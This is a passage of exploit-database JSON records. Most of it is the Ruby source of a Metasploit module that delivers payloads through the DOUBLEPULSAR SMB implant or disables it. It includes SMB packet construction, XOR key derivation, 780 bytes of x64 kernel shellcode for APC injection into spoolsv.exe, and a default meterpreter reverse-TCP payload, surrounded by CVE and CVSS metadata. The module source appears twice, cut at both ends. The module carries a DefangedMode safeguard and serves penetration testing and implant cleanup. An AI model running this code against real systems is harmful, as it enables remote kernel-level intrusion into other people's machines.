0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:17:13", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "172ac72cb050a2c48305c9174a12ebbf", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-03T00:16:48", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
